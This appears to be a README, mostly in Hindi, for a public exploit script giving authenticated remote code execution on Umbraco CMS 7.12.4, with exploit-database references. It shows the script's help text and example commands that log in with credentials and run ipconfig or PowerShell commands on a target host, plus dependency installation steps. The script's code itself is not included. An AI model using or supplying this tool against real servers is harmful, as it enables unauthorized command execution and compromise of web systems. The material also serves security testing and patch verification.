
Umbraco CMS 7.12.4 - (प्रमाणित) रिमोट कोड निष्पादन
Umbraco CMS 7.12.4 - (प्रमाणित) रिमोट कोड निष्पादन
[EDB-49488] [PacketStorm] [WLB-2020080012]
$ python exploit.py -h
usage: exploit.py [-h] -u USER -p PASS -i URL -c CMD [-a ARGS]
Umbraco authenticated RCE
optional arguments:
-h, --help show this help message and exit
-u USER, --user USER username / email
-p PASS, --password PASS password
-i URL, --host URL root URL
-c CMD, --command CMD command
-a ARGS, --arguments ARGS arguments
उदाहरण:
$ python exploit.py -u [email protected] -p password123 -i 'http://10.0.0.1' -c ipconfig
$ python exploit.py -u [email protected] -p password123 -i 'http://10.0.0.1' -c powershell.exe -a '-NoProfile -Command ls'
ArchLinux के लिए उदाहरण:
pacman -S python-beautifulsoup4 python-requests
pip का उपयोग करने का उदाहरण:
pip3 install -r requirements.txt
यह EDB-ID-46153 का बेहतर पुनर्लेखन है जिसमें तर्कों (हार्डकोडेड मानों के बजाय) और stdout प्रदर्शन का उपयोग किया गया है।
python 3.8 के साथ परीक्षण किया गया।